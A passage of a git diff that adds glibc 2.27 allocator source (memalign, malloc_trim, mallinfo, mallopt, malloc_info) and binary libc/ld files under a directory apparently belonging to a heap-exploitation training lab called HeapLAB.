+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		    "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		      "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27/ld-2.27.so
new file mode 100755
index 0000000..6cb4121
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27/ld.so.2 b/HeapLAB/.glibc/glibc_2.27/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27/libc-2.27.so
new file mode 100755
index 0000000..b334132
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27/libc.so.6 b/HeapLAB/.glibc/glibc_2.27/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
new file mode 100644
index 0000000..f8e7250
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
@@ -0,0 +1,5607 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
